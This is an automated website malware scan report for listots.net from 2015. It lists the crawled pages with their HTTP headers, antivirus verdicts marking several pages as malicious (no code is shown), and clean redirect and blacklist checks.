Scanned pages/files
Request | Server response | Status |
http://listots.net/ | 200 OK Content-Length: 20429 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below). Antivirus reports:
https://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js | 200 OK Content-Length: 77746 Content-Type: text/javascript | clean |
http://listots.net/css/js.js | 200 OK Content-Length: 1660 Content-Type: application/x-javascript | clean |
http://listots.net/?lang=en | HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 26 Feb 2015 12:13:10 GMT Pragma: no-cache Location: / Server: nginx Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=8dddp87dqn4pued4uvujst17i3; path=/ X-Powered-By: PHP/5.3.3-7+squeeze19 | clean |
http://listots.net/test404page.js | 200 OK Content-Length: 383 Content-Type: text/html | clean |
http://jwpsrv.com/library/V3zuDmQ2EeOxhCIACmOLpg.js | 200 OK Content-Length: 75568 Content-Type: text/javascript | clean |
http://listots.net/?lang=pl | HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 26 Feb 2015 12:13:11 GMT Pragma: no-cache Location: / Server: nginx Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=c3qr621c07087c84nh5nktcvg4; path=/ X-Powered-By: PHP/5.3.3-7+squeeze19 | clean |
http://listots.net/?lang=no | HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 26 Feb 2015 12:13:11 GMT Pragma: no-cache Location: / Server: nginx Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=3ugt6kuafdvb2u6ruu3mlks112; path=/ X-Powered-By: PHP/5.3.3-7+squeeze19 | clean |
http://listots.net/index.php | 200 OK Content-Length: 20456 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below). Antivirus reports:
http://listots.net/index.php?lang=en | HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 26 Feb 2015 12:13:12 GMT Pragma: no-cache Location: /index.php Server: nginx Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=r3ok4ab6ifsnb4j92k0u4bcdr1; path=/ X-Powered-By: PHP/5.3.3-7+squeeze19 | clean |
http://listots.net/index.php?lang=pl | HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 26 Feb 2015 12:13:12 GMT Pragma: no-cache Location: /index.php Server: nginx Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=rb2231vk47irk678ko10jj1es4; path=/ X-Powered-By: PHP/5.3.3-7+squeeze19 | clean |
http://listots.net/index.php?lang=no | HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 26 Feb 2015 12:13:12 GMT Pragma: no-cache Location: /index.php Server: nginx Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=qtd1e3knrgm8u7cf1s8sh0k2g6; path=/ X-Powered-By: PHP/5.3.3-7+squeeze19 | clean |
http://listots.net/index.php?action=support | 200 OK Content-Length: 8197 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below). Antivirus reports:
http://listots.net/index.php?action=support&lang=en | HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 26 Feb 2015 12:13:12 GMT Pragma: no-cache Location: /index.php?action=support Server: nginx Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=t1unlg2v51531fmi98loppk1d7; path=/ X-Powered-By: PHP/5.3.3-7+squeeze19 | clean |
http://listots.net/index.php?action=support&lang=pl | HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 26 Feb 2015 12:13:13 GMT Pragma: no-cache Location: /index.php?action=support Server: nginx Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=7evihliq0pr0e46qme5cr362s0; path=/ X-Powered-By: PHP/5.3.3-7+squeeze19 | clean |
http://listots.net/index.php?action=support&lang=no | HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 26 Feb 2015 12:13:13 GMT Pragma: no-cache Location: /index.php?action=support Server: nginx Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=ijeks580ce1u0ops7dj4rq7tr6; path=/ X-Powered-By: PHP/5.3.3-7+squeeze19 | clean |
http://listots.net/index.php?action=register | 200 OK Content-Length: 8403 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below). Antivirus reports:
http://listots.net/index.php?action=register&lang=en | HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 26 Feb 2015 12:13:13 GMT Pragma: no-cache Location: /index.php?action=register Server: nginx Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=dch520oh425rekdp26mjvuh2a0; path=/ X-Powered-By: PHP/5.3.3-7+squeeze19 | clean |
http://listots.net/index.php?action=register&lang=pl | HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 26 Feb 2015 12:13:13 GMT Pragma: no-cache Location: /index.php?action=register Server: nginx Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=q85pffgkv4d65ti4sh4tqdoda2; path=/ X-Powered-By: PHP/5.3.3-7+squeeze19 | clean |
http://listots.net/index.php?action=register&lang=no | HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 26 Feb 2015 12:13:13 GMT Pragma: no-cache Location: /index.php?action=register Server: nginx Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=81j08bsl5bgjqnb4ubjv98bga1; path=/ X-Powered-By: PHP/5.3.3-7+squeeze19 | clean |
http://listots.net/index.php?action=download | 200 OK Content-Length: 9503 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below). Antivirus reports:
http://listots.net/index.php?action=download&lang=en | HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 26 Feb 2015 12:13:14 GMT Pragma: no-cache Location: /index.php?action=download Server: nginx Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=p0c2s93mm69rrf83irimie4hv2; path=/ X-Powered-By: PHP/5.3.3-7+squeeze19 | clean |
http://listots.net/index.php?action=download&lang=pl | HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 26 Feb 2015 12:13:14 GMT Pragma: no-cache Location: /index.php?action=download Server: nginx Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=409ef7kh02n0e4srdp6ls1pm16; path=/ X-Powered-By: PHP/5.3.3-7+squeeze19 | clean |
http://listots.net/index.php?action=download&lang=no | HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 26 Feb 2015 12:13:14 GMT Pragma: no-cache Location: /index.php?action=download Server: nginx Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=sb1tf77emvgouh9e3mi9penko0; path=/ X-Powered-By: PHP/5.3.3-7+squeeze19 | clean |
http://listots.net/download/ipchanger.zip | 200 OK Content-Length: 301144 Content-Type: application/zip | clean |
http://listots.net/index.php?byco=&oocoo=&page=0 | 200 OK Content-Length: 20516 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below). Antivirus reports:
http://listots.net/index.php?byco=&oocoo=&page=0&lang=en | HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 26 Feb 2015 12:13:15 GMT Pragma: no-cache Location: /index.php?byco=&oocoo=&page=0 Server: nginx Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=thd4oj4iapdudm0bra9g8mhfa7; path=/ X-Powered-By: PHP/5.3.3-7+squeeze19 | clean |
http://listots.net/index.php?byco=&oocoo=&page=0&lang=pl | HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 26 Feb 2015 12:13:15 GMT Pragma: no-cache Location: /index.php?byco=&oocoo=&page=0 Server: nginx Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=gsa032m5ut09g95hmmn9nju5d2; path=/ X-Powered-By: PHP/5.3.3-7+squeeze19 | clean |
http://listots.net/index.php?byco=&oocoo=&page=0&lang=no | HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 26 Feb 2015 12:13:15 GMT Pragma: no-cache Location: /index.php?byco=&oocoo=&page=0 Server: nginx Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=9lemcb0m0bfmnn31kd36r6qu37; path=/ X-Powered-By: PHP/5.3.3-7+squeeze19 | clean |
http://listots.net/index.php?byco=&oocoo=&page=1 | 200 OK Content-Length: 20516 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below). Antivirus reports:
http://listots.net/index.php?byco=&oocoo=&page=1&lang=en | HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 26 Feb 2015 12:13:16 GMT Pragma: no-cache Location: /index.php?byco=&oocoo=&page=1 Server: nginx Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=sspmo36e5up17b7a3dju3nrup6; path=/ X-Powered-By: PHP/5.3.3-7+squeeze19 | clean |
http://listots.net/index.php?byco=&oocoo=&page=1&lang=pl | HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 26 Feb 2015 12:13:16 GMT Pragma: no-cache Location: /index.php?byco=&oocoo=&page=1 Server: nginx Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=bjdi6k9iorj5ckhi017bgaa420; path=/ X-Powered-By: PHP/5.3.3-7+squeeze19 | clean |
http://listots.net/index.php?byco=&oocoo=&page=1&lang=no | HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 26 Feb 2015 12:13:16 GMT Pragma: no-cache Location: /index.php?byco=&oocoo=&page=1 Server: nginx Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=95k9m2r8k79lpalucpqoji4377; path=/ X-Powered-By: PHP/5.3.3-7+squeeze19 | clean |
http://listots.net/index.php?byco=&oocoo=&page=2 | 200 OK Content-Length: 9667 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below). Antivirus reports:
http://listots.net/index.php?byco=&oocoo=&page=2&lang=en | HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 26 Feb 2015 12:13:16 GMT Pragma: no-cache Location: /index.php?byco=&oocoo=&page=2 Server: nginx Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=4iikodlrt1oigjfdqvb7eh0rv2; path=/ X-Powered-By: PHP/5.3.3-7+squeeze19 | clean |
http://listots.net/index.php?byco=&oocoo=&page=2&lang=pl | HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 26 Feb 2015 12:13:17 GMT Pragma: no-cache Location: /index.php?byco=&oocoo=&page=2 Server: nginx Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=fjotgl2nv6t88erg2vocu0hph6; path=/ X-Powered-By: PHP/5.3.3-7+squeeze19 | clean |
http://listots.net/index.php?byco=&oocoo=&page=2&lang=no | HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 26 Feb 2015 12:13:17 GMT Pragma: no-cache Location: /index.php?byco=&oocoo=&page=2 Server: nginx Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=bj8496igdkoa14ha3ndu7hkem7; path=/ X-Powered-By: PHP/5.3.3-7+squeeze19 | clean |
http://listots.net/index.php?byco=&oocoo=&page=3 | 200 OK Content-Length: 9667 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below). Antivirus reports:
http://listots.net/index.php?byco=&oocoo=&page=3&lang=en | HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 26 Feb 2015 12:13:17 GMT Pragma: no-cache Location: /index.php?byco=&oocoo=&page=3 Server: nginx Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=d0sul2kmtqgtpfr90nuufam506; path=/ X-Powered-By: PHP/5.3.3-7+squeeze19 | clean |
http://listots.net/index.php?byco=&oocoo=&page=3&lang=pl | HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 26 Feb 2015 12:13:17 GMT Pragma: no-cache Location: /index.php?byco=&oocoo=&page=3 Server: nginx Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=ri19d03rb5lqqrlpblukmcki02; path=/ X-Powered-By: PHP/5.3.3-7+squeeze19 | clean |
http://listots.net/index.php?byco=&oocoo=&page=3&lang=no | HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 26 Feb 2015 12:13:17 GMT Pragma: no-cache Location: /index.php?byco=&oocoo=&page=3 Server: nginx Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=6ro6u6gm07ipbkel1isncp6nb7; path=/ X-Powered-By: PHP/5.3.3-7+squeeze19 | clean |
http://listots.net/index.php?byco=&oocoo=&page=4 | 200 OK Content-Length: 9667 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below). Antivirus reports:
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: listots.net
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Thu, 26 Feb 2015 12:13:09 GMT
Pragma: no-cache
Server: nginx
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=cc7ie2s6iel18fp69o9n841go2; path=/
X-Powered-By: PHP/5.3.3-7+squeeze19
Second query (visit from search engine):
GET / HTTP/1.1
Host: listots.net
Referer: http://www.google.com/search?q=listots.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=listots.net
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://listots.net/
Result: listots.net is not infected or malware details are not published yet.